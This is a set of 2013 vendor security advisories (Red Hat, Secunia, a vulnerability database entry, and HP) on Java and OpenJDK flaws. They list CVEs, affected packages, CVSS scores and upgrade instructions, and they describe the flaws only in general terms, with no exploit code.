CVE Names: CVE-2013-0424 CVE-2013-0425 CVE-2013-0426
CVE-2013-0427 CVE-2013-0428 CVE-2013-0429
CVE-2013-0431 CVE-2013-0432 CVE-2013-0433
CVE-2013-0434 CVE-2013-0435 CVE-2013-0440
CVE-2013-0441 CVE-2013-0442 CVE-2013-0443
CVE-2013-0444 CVE-2013-0445 CVE-2013-0450
CVE-2013-1475 CVE-2013-1476 CVE-2013-1478
CVE-2013-1480
=====================================================================
1. Summary:
Updated java-1.7.0-openjdk packages that fix several security issues are
now available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
3. Description:
These packages provide the OpenJDK 7 Java Runtime Environment and the
OpenJDK 7 Software Development Kit.
Multiple improper permission check issues were discovered in the AWT,
CORBA, JMX, Libraries, and Beans components in OpenJDK. An untrusted Java
application or applet could use these flaws to bypass Java sandbox
restrictions. (CVE-2013-0442, CVE-2013-0445, CVE-2013-0441, CVE-2013-1475,
CVE-2013-1476, CVE-2013-0429, CVE-2013-0450, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0428, CVE-2013-0444)
Multiple flaws were found in the way image parsers in the 2D and AWT
components handled image raster parameters. A specially-crafted image could
cause Java Virtual Machine memory corruption and, possibly, lead to
arbitrary code execution with the virtual machine privileges.
(CVE-2013-1478, CVE-2013-1480)
A flaw was found in the AWT component's clipboard handling code. An
untrusted Java application or applet could use this flaw to access
clipboard data, bypassing Java sandbox restrictions. (CVE-2013-0432)
The default Java security properties configuration did not restrict access
to certain com.sun.xml.internal packages. An untrusted Java application or
applet could use this flaw to access information, bypassing certain Java
sandbox restrictions. This update lists the whole package as restricted.
(CVE-2013-0435)
Multiple improper permission check issues were discovered in the JMX,
Libraries, Networking, and JAXP components. An untrusted Java application
or applet could use these flaws to bypass certain Java sandbox
restrictions. (CVE-2013-0431, CVE-2013-0427, CVE-2013-0433, CVE-2013-0434)
It was discovered that the RMI component's CGIHandler class used user
inputs in error messages without any sanitization. An attacker could use
this flaw to perform a cross-site scripting (XSS) attack. (CVE-2013-0424)
It was discovered that the SSL/TLS implementation in the JSSE component
did not properly enforce handshake message ordering, allowing an unlimited
number of handshake restarts. A remote attacker could use this flaw to
make an SSL/TLS server using JSSE consume an excessive amount of CPU by
continuously restarting the handshake. (CVE-2013-0440)
It was discovered that the JSSE component did not properly validate
Diffie-Hellman public keys. An SSL/TLS client could possibly use this flaw
to perform a small subgroup attack. (CVE-2013-0443)
This erratum also upgrades the OpenJDK package to IcedTea7 2.3.5. Refer to
the NEWS file, linked to in the References, for further information.
All users of java-1.7.0-openjdk are advised to upgrade to these updated
packages, which resolve these issues. All running instances of OpenJDK Java
must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)
906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
6. Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.src.rpm
i386:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.i386.rpm
x86_64:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.src.rpm
i386:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.i386.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.i386.rpm
x86_64:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
x86_64:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386:
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm
noarch:
java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm
x86_64:
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
x86_64:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
noarch:
java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm
x86_64:
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm
x86_64:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386:
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm
noarch:
java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm
x86_64:
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm
x86_64:
java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386:
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm
noarch:
java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm
x86_64:
java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0429.html
https://www.redhat.com/security/data/cve/CVE-2013-0431.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0444.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-1475.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://access.redhat.com/security/updates/classification/#important
http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.5/NEWS
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRFVXMXlSAg2UNWIIRAvzmAJsEIinMVfUD8oFejiNBbKBOxDtgqwCePy0t
WzOE5rFNiST5oFX5kr3mRQA=
=+39R
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201302-0239 | CVE-2013-0438 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
This vulnerability affects the following supported versions:
7 Update 11 and prior
6 Update 38 and prior
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03714148
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03714148
Version: 1
HPSBUX02857 SSRT101103 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-03-25
Last Updated: 2013-03-22
Potential Security Impact: Remote unauthorized access, disclosure of
information, and other vulnerabilities?
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, disclosure of
information, and other exploits.
References: CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0169,
CVE-2013-0351, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424,
CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429,
CVE-2013-0431, CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435,
CVE-2013-0437, CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442,
CVE-2013-0443, CVE-2013-0444, CVE-2013-0445, CVE-2013-0446, CVE-2013-0449,
CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480, CVE-2013-1484, CVE-2013-1485, CVE-2013-1486,
CVE-2013-1487, CVE-2013-1489, CVE-2013-1493
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.04 and earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0169 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0431 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0437 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0444 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1484 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1485 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1486 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1487 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1489 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
HP-UX B.11.23, B.11.31
JDK and JRE v7.0.05 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v7.0 update to Java v7.0.05 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk70.JDK70-COM
Jdk70.JDK70-DEMO
Jdk70.JDK70-IPF32
Jdk70.JDK70-IPF64
Jre70.JRE70-COM
Jre70.JRE70-IPF32
Jre70.JRE70-IPF32-HS
Jre70.JRE70-IPF64
Jre70.JRE70-IPF64-HS
action: install revision 1.7.0.04.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 25 March 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
